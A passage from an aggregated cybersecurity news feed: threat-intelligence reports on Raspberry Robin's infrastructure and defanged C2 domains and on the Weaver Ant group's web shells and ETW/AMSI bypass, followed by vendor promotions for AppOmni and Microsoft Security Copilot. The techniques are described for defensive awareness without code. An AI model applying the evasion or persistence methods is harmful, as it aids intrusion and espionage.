"Raspberry Robin (also known as Roshtyak or Storm-0856) is a complex and evolving threat actor that provides initial access broker (IAB) services to numerous criminal groups, many of which have connections to Russia," Silent Push said in a report shared with The Hacker News.

Since its emergence in 2019, the malware has become a conduit for various malicious strains like SocGholish, Dridex, LockBit, IcedID, BumbleBee, and TrueBot. It's also referred to as a QNAP worm owing to the use of compromised QNAP devices to retrieve the payload.

Over the years, Raspberry Robin attack chains have added a new distribution method that involves downloading it via archives and Windows Script Files sent as attachments using the messaging service Discord, not to mention acquiring one-day exploits to achieve local privilege escalation before they were publicly disclosed.

There is also some evidence to suggest that the malware is offered to other actors as a pay-per-install (PPI) botnet to deliver next-stage malware.

Furthermore, Raspberry Robin infections have incorporated a USB-based propagation mechanism that involves using a compromised USB drive containing a Windows shortcut (LNK) file disguised as a folder to activate the deployment of the malware.

The U.S. government has since revealed that the Russian nation-state threat actor tracked as Cadet Blizzard may have used Raspberry Robin as an initial access facilitator.

Silent Push, in its latest analysis undertaken along with Team Cymru, found one IP address that was being used as a data relay to connect all compromised QNAP devices, ultimately leading to the discovery of over 180 unique C2 domains.

"The singular IP address was connected through Tor relays, which is likely how network operators issued new commands and interacted with compromised devices," the company said. "The IP used for this relay was based in an E.U. country."

A deeper investigation of the infrastructure has revealed that the Raspberry Robin C2 domains are short – e.g., q2[.]rs​, m0[.]wf​, h0[.]wf, and 2i[.]pm – and that they are rapidly rotated between compromised devices and through IPs using a technique called fast flux in an effort to make it challenging to take them down.

Some of the top Raspberry Robin top-level domains (TLDs) are .wf​, .pm​, .re​, .nz​, .eu​, .gy​, .tw, and .cx, with domains registered using niche registrars like Sarek Oy, 1API GmbH, NETIM, Epag[.]de, CentralNic Ltd, and Open SRS. A majority of the identified C2 domains have name servers on a Bulgarian company named ClouDNS.

"Raspberry Robin's use by Russian government threat actors aligns with its history of working with countless other serious threat actors, many of whom have connections to Russia," the company said. "These include LockBit, Dridex, SocGholish, DEV-0206, Evil Corp (DEV-0243), Fauppod, FIN11, Clop Gang, and Lace Tempest (TA505)."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/OZz0R9w
via IFTTT

Chinese Hackers Breach Asian Telecom, Remain Undetected for Over 4 Years

A major telecommunications company located in Asia was allegedly breached by Chinese state-sponsored hackers who spent over four years inside its systems, according to a new report from incident response firm Sygnia.

The cybersecurity company is tracking the activity under the name Weaver Ant, describing the threat actor as stealthy and highly persistent. The name of the telecom provider was not disclosed.

"Using web shells and tunneling, the attackers maintained persistence and facilitated cyber espionage," Sygnia said. "The group behind this intrusion [...] aimed to gain and maintain continuous access to telecommunication providers and facilitate cyber espionage by collecting sensitive information."

The attack chain is said to have involved the exploitation of a public-facing application to drop two different web shells, an encrypted variant of China Chopper and a previously undocumented malicious tool dubbed INMemory. It's worth noting that China Chopper has been put to use by multiple Chinese hacking groups in the past.

INMemory, as the name implies, is designed to decode a Base64-encoded string and execute it entirely in memory without writing it to disk, thereby leaving no forensic trail.

"The 'INMemory' web shell executed the C# code contained within a portable executable (PE) named 'eval.dll,' which ultimately runs the payload delivered via an HTTP request," Sygnia said.

The web shells have been found to act as a stepping stone to deliver next-stage payloads, the most notable being a recursive HTTP tunnel tool that is utilized to facilitate lateral movement over SMB, a tactic previously adopted by other threat actors like Elephant Beetle.

What's more, the encrypted traffic passing through the web shell tunnel serves as a conduit to perform a series of post-exploitation actions, including -

  • Patching Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) to bypass detection
  • Using System.Management.Automation.dll to execute PowerShell commands without initiating PowerShell.exe, and
  • Executing reconnaissance commands against the compromised Active Directory environment to identify high-privilege accounts and critical servers

Sygnia said Weaver Ant exhibits hallmarks typically associated with a China-nexus cyber espionage group owing to the targeting patterns and the "well-defined" goals of the campaign.

This link is also evidenced by the presence of the China Chopper web shell, the use of an Operational Relay Box (ORB) network comprising Zyxel routers to proxy traffic and obscure their infrastructure, the working hours of the hackers, and the deployment of an Outlook-based backdoor formerly attributed to Emissary Panda.

"Throughout this period, Weaver Ant adapted their TTPs to the evolving network environment, employing innovative methods to regain access and sustain their foothold," the company said. "The modus operandi of Chinese-nexus intrusion sets typically involves the sharing of tools, infrastructure, and occasionally manpower—such as through shared contractors."

China Identifies 4 Taiwanese Hackers Allegedly Behind Espionage

The disclosure comes days after China's Ministry of State Security (MSS) accused four individuals purportedly linked to Taiwan's military of conducting cyber attacks against the mainland. Taiwan has refuted the allegations.

The MSS said the four individuals are members of Taiwan's Information, Communications, and Electronic Force Command (ICEFCOM), and that the entity engages in phishing attacks, propaganda emails targeting government and military agencies, and disinformation campaigns using social media aliases.

The intrusions are also alleged to have involved the extensive use of open-source tools like the AntSword web shell, IceScorpion, Metasploit, and Quasar RAT.

"The 'Information, Communications and Electronic Force Command' has specifically hired hackers and cybersecurity companies as external support to execute the cyber warfare directives issued by the Democratic Progressive Party (DPP) authorities," it said. "Their activities include espionage, sabotage, and propaganda."

Coinciding with the MSS statement, Chinese cybersecurity firms QiAnXin and Antiy have detailed spear-phishing attacks orchestrated by a Taiwanese threat actor codenamed APT-Q-20 (aka APT-C-01, GreenSpot, Poison Cloud Vine, and White Dolphin) that lead to the delivery of a C++ trojan and command-and-control (C2) frameworks like Cobalt Strike and Sliver.

Other initial access methods entails the exploitation of N-day security vulnerabilities and weak passwords in Internet of Things devices such as routers, cameras, and firewalls, QiAnXin added, characterizing the threat actor's activities as "not particularly clever."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/nUWkwjR
via IFTTT

AI-Powered SaaS Security: Keeping Pace with an Expanding Attack Surface

Organizations now use an average of 112 SaaS applications—a number that keeps growing. In a 2024 study, 49% of 644 respondents who frequently used Microsoft 365 believed that they had less than 10 apps connected to the platform, despite the fact that aggregated data indicated over 1,000+ Microsoft 365 SaaS-to-SaaS connections on average per deployment. And that's just one major SaaS provider. Imagine other unforeseen critical security risks:

  • Each SaaS app has unique security configurations—making misconfigurations a top risk.
  • Business-critical apps (CRM, finance, and collaboration tools) store vast amounts of sensitive data, making them prime targets for attackers.
  • Shadow IT and third-party integrations introduce hidden vulnerabilities that often go unnoticed.
  • Large and small third-party AI service providers (e.g. audio/video transcription service) may not comply with legal and regulatory requirements, or properly test and review code.

Major SaaS providers also have thousands of developers pushing changes every day. Understanding each SaaS app, assessing risks, and securing configurations is overwhelming and inhumanly possible. And much of it is just noise. Perhaps nothing malicious is going on at scale, but small details can often be overlooked.

Traditional security approaches simply cannot scale to meet these demands, leaving organizations exposed to potential breaches.

AI: The Only Way to Keep Up

The complexity of SaaS security is outpacing the resources and effort needed to secure it. AI is no longer optional, it's essential. AI-driven security solutions like AskOmni by AppOmni—which combine Generative AI (or GenAI) and advanced analytics—are transforming SaaS security by:

✓ Delivering instant security insights through conversational AI.

✓ Investigating security events efficiently.

✓ Turning complex SaaS security questions into clear, actionable answers.

✓ Visualizing risks for deeper understanding.

✓ Breaking language barriers—multi-lingual support enables security teams to interact with AI in Japanese, French, and English. With multi-lingual support, teams worldwide can interact with security data in their native language—enhancing accessibility and response times.

For example, with its ability to stitch together context from disparate data points, AskOmni can notify administrators about issues caused by overprovisioning of privileges, taking into account access patterns, sensitive data, or compliance requirements, and guide them through the remediation process. Beyond typical threat notifications, AskOmni alerts administrators to new threats, explaining potential consequences and offering prioritized remediation steps.

The Power of AI + Data Depth

High-quality data is the fuel that powers GenAI, but it's often in short supply. While GenAI is increasingly used to create synthetic data for simulations, detection testing, or red-teaming exercises, the quality of that data determines the effectiveness of the outcomes.

Generative models require clean, relevant, and unbiased datasets to avoid producing inaccurate or misleading results. That's a major challenge in cybersecurity domains where high-fidelity threat intel, logs, and labeled incident data are scarce or siloed.

For instance, building a GenAI model to simulate cloud breach scenarios demands access to detailed, context-rich telemetry—something that's not always available due to privacy concerns or lack of standardized formats.

But GenAI can be a powerful tool that can automate threat research to accelerate incident reporting, helping streamline workflows for researchers, engineers, and analysts alike. Its success, however, depends on solving the data quality and availability gap first.

In SaaS security, finding fast, actionable answers traditionally means sifting through data, which can be time-consuming and requires expertise.

AI is only as effective as the data it analyzes. The ability to analyze security events allows AI to provide deep visibility into SaaS environments and detect threats with greater accuracy. Security teams benefit from AI's ability to prioritize risks, correlate complex security observations, and provide recommendations grounded in real-world expertise.

With 101+ million users secured and 2+ billion security events processed daily, AppOmni ensures:

  • Deep visibility into SaaS environments
  • Accurate risk detection and prioritization
  • Actionable security insights grounded in expertise

Real-World Impact: AI in Action

A global enterprise recently leveraged AI to assess its complex SaaS environment. With just a few prompts, AskOmni efficiently analyzed the system and highlighted key areas for focus. AskOmni provided the following insights that one customer was able to immediately action and remediate:

  • An application bypassing IP restrictions: a critical misconfiguration.
  • Unauthorized self-authorization in Salesforce: a major security gap.
  • Outdated high-risk applications: flagged before they could be exploited.

Without AI, identifying these risks would have taken hours or been missed entirely.

The Present and Future Belongs to AI-Driven SaaS Security

AI is not just enhancing the security of SaaS applications — it's redefining what is possible. Organizations using AI-powered security tools will gain a critical edge in protecting their data and staying ahead of cyber threats.

Stop searching, start asking. Get SaaS security answers with AppOmni.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/QRYvFcf
via IFTTT

Monday, March 24, 2025

Microsoft unveils Microsoft Security Copilot agents and new protections for AI

In this age of AI, securing AI and using it to boost security are crucial for every organization. At Microsoft, we are dedicated to helping organizations secure their future with our AI-first, end-to-end security platform.

One year ago, we launched Microsoft Security Copilot to empower defenders to detect, investigate, and respond to security incidents swiftly and accurately. Now, we are excited to announce the next evolution of Security Copilot with AI agents designed to autonomously assist with critical areas such as phishing, data security, and identity management. The relentless pace and complexity of cyberattacks have surpassed human capacity and establishing AI agents is a necessity for modern security.

For example, phishing attacks remain one of the most common and damaging cyberthreats. Between January and December 2024, Microsoft detected more than 30 billion phishing emails targeting customers.1 The volume of these cyberattacks overwhelms security teams relying on manual processes and fragmented defenses, making it difficult to both triage malicious messages promptly and leverage data-driven insights for broader cyber risk management.

The phishing triage agent in Microsoft Security Copilot being unveiled today can handle routine phishing alerts and cyberattacks, freeing up human defenders to focus on more complex cyberthreats and proactive security measures. This is just one way agents can transform security.

Additionally, securing and governing AI continues to be the top priority for organizations, and we are excited to advance our purpose-built solutions with new innovations across Microsoft Defender, Microsoft Entra, and Microsoft Purview. 

Read on to learn about other agents we are introducing to Security Copilot and important developments in securing AI. 

Expanding Microsoft Security Copilot with AI agentic capabilities

Microsoft Threat Intelligence now processes 84 trillion signals per day, revealing the exponential growth in cyberattacks, including 7,000 password attacks per second.1 Scaling cyber defenses through AI agents is now an imperative to keep pace with this threat landscape. We are expanding Security Copilot with six security agents built by Microsoft and five security agents built by our partners—available for preview in April 2025.

Six new agentic solutions from Microsoft Security

Building on the transformative capabilities of Security Copilot, the six Microsoft Security Copilot agents enable teams to autonomously handle high-volume security and IT tasks while seamlessly integrating with Microsoft Security solutions. Purpose-built for security, agents learn from feedback, adapt to workflows, and operate securely—aligned to Microsoft’s Zero Trust framework. With security teams fully in control, agents accelerate responses, prioritize risks, and drive efficiency to enable proactive protection and strengthen an organization’s security posture.

Security Copilot agents will be available across the Microsoft end-to-end security platform, designed for the following:

  • Phishing Triage Agent in Microsoft Defender triages phishing alerts with accuracy to identify real cyberthreats and false alarms. It provides easy-to-understand explanations for its decisions and improves detection based on admin feedback.
  • Alert Triage Agents in Microsoft Purview triage data loss prevention and insider risk alerts, prioritize critical incidents, and continuously improve accuracy based on admin feedback.
  • Conditional Access Optimization Agent in Microsoft Entra monitors for new users or apps not covered by existing policies, identifies necessary updates to close security gaps, and recommends quick fixes for identity teams to apply with a single click.
  • Vulnerability Remediation Agent in Microsoft Intune monitors and prioritizes vulnerabilities and remediation tasks to address app and policy configuration issues and expedites Windows OS patches with admin approval.
  • Threat Intelligence Briefing Agent in Security Copilot automatically curates relevant and timely threat intelligence based on an organization’s unique attributes and cyberthreat exposure.

Security Copilot’s agentic capabilities are an example of how we continue to deliver innovation leveraging our decades of AI research. See how agents work.

“This is just the beginning; our security AI research is pushing the boundaries of innovation, and we are eager to continuously bring even greater value to our customers at the speed of AI.”  

—Alexander Stojanovic, Vice President of Microsoft Security AI Applied Research

Five new agentic solutions from Microsoft Security partners

Security is a team sport and Microsoft is committed to empowering our security ecosystem with an open platform upon which partners can build to deliver value to customers. In this spirit, the following five AI agents from our partners will be available in Security Copilot:

  • Privacy Breach Response Agent by OneTrust analyzes data breaches to generate guidance for the privacy team on how to meet regulatory requirements.
  • Network Supervisor Agent by Aviatrix performs root cause analysis and summarizes issues related to VPN, gateway, or Site2Cloud connection outages and failures.
  • SecOps Tooling Agent by BlueVoyant assesses a security operations center (SOC) and state of controls to make recommendations that help optimize security operations and improve controls, efficacy, and compliance.
  • Alert Triage Agent by Tanium provides analysts with the necessary context to quickly and confidently make decisions on each alert.
  • Task Optimizer Agent by Fletch helps organizations forecast and prioritize the most critical cyberthreat alerts to reduce alert fatigue and improve security.

“An agentic approach to privacy will be game-changing for the industry. Autonomous AI agents will help our customers scale, augment, and increase the effectiveness of their privacy operations. Built using Microsoft Security Copilot, the OneTrust Privacy Breach Response Agent demonstrates how privacy teams can analyze and meet increasingly complex regulatory requirements in a fraction of the time required historically.”

—Blake Brannon, Chief Product and Strategy Officer, OneTrust

Learn more about Security Copilot agents and get started with Security Copilot. Current Security Copilot customers can join our Customer Connection Program for the latest updates.

New AI-powered data security investigations and analysis   

We are also announcing Microsoft Purview data security investigations to help data security teams quickly understand and mitigate risks associated with sensitive data exposure. Data security investigations introduce AI-powered deep content analysis, which identifies sensitive data and other risks linked to incidents. Incident investigators can use these insights to collaborate securely with partner teams and simplify complex and time-consuming tasks, thus improving mitigation. This solution links data security investigations to Defender incidents and Purview insider risk cases—available for preview starting April 2025.  

Further advances in securing and governing generative AI

Successful AI transformation requires a strong cybersecurity foundation. As organizations rapidly adopt generative AI, there is growing urgency to secure and govern the creation, adoption, and use of AI in the workplace. According to our new report, “Secure employee access in the age of AI,” 57% of organizations report an increase in security incidents from AI usage. And while most organizations recognize the need for AI controls, 60% have not yet started.

Securing AI is still a relatively new challenge, and leaders share some specific concerns: how to prevent data oversharing and leakage; how to minimize new AI threats and vulnerabilities; and how to comply with shifting regulatory compliance requirements. Microsoft Security solutions are purpose-built for AI to help every organization address these concerns. We’re announcing new advanced capabilities so that organizations can secure their AI investments—both Microsoft AI and other AI.

AI security posture management for multimodel and multicloud environments

Organizations developing their own custom AI solutions will need to strengthen the security posture for AI that they source from multiple models, running in multiple AI platforms and clouds. To address this need, Microsoft Defender has extended AI security posture management beyond Microsoft Azure and Amazon Web Services to include Google VertexAI and all models in the Azure AI Foundry model catalog. Available for preview in May 2025, this coverage includes Gemini, Gemma, Meta Llama, Mistral, and custom models. With new multicloud interoperability, organizations will gain broader code-to-runtime AI security posture visibility across Microsoft Azure, Amazon Web Services, and Google Cloud. Microsoft Defender can give organizations a jumpstart to securing AI posture across multimodel and multicloud environments.

New detection and protection for emerging AI threats

With AI comes new risks, including new cyberattack surfaces and unknown vulnerabilities. The Open Worldwide Application Security Project (OWASP) identifies the highest priority risks and mitigations for generative AI apps. Starting in May 2025, new and enriched AI detections for several risks identified by OWASP such as indirect prompt injection attacks, sensitive data exposure, and wallet abuse will be generally available in Microsoft Defender. With these new detections, SOC analysts can better protect and defend custom-built AI apps with new safeguards for Azure OpenAI Service and models found in the Azure AI Foundry catalog.

New controls to prevent risky access and data leaks into shadow AI apps

With the rapid user adoption of generative AI, many organizations are uncovering widespread use of AI apps that have not yet been approved by IT or security teams. This unsanctioned, unprotected use of AI has created a “shadow AI” phenomenon, which has drastically increased the risk of sensitive data leakage. We are announcing general availability of AI web category filter in Microsoft Entra internet access to help enforce granular access controls that can curb the risk of shadow AI by enforcing policies governing which users and groups have access to different types of AI applications.

With policy enforcement in place to govern authorized access to AI apps, the next layer of defense is to prevent users from leaking sensitive data into AI apps. To address this, we are announcing the preview of Microsoft Purview browser data loss prevention (DLP) controls built into Microsoft Edge for Business. This helps security teams enforce DLP policies to prevent sensitive data from being typed into generative AI apps, starting with ChatGPT, Copilot Chat, DeepSeek, and Google Gemini.

Learn more about our new innovations in Security for AI.

New phishing protection in Microsoft Teams for safer collaboration

While email continues to be the primary cyberthreat vector for phishing, collaboration software has become a common target. Generally available in April 2025, Microsoft Defender for Office 365 will protect users against phishing and other advanced cyberthreats within Teams. With inline protection, Teams will have better protection against malicious URLs, including real-time detonation of attachments and links. And to give SOC teams full visibility into related attempts and incidents, alerts and data will be available in Microsoft Defender. 

Agile innovation to build a safer world

We continue to innovate across the Microsoft Security portfolio, applying the principles of our Secure Future Initiative, to deliver powerful, end-to-end protection to give defenders industry-leading AI, and to empower every organization with the tools to secure and govern AI. We are grateful for our customers and partners and together, with them, we look forward to building a more secure world for all.

Microsoft Secure

To see these innovations in action, join us on April 9, 2025 for Microsoft Secure, a digital event focused on security in the age of AI. 

A woman in black dress

Learn with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.


1Based on Microsoft internal data.

The post Microsoft unveils Microsoft Security Copilot agents and new protections for AI appeared first on Microsoft Security Blog.



from Microsoft Security Blog https://ift.tt/eLhTOs1
via IFTTT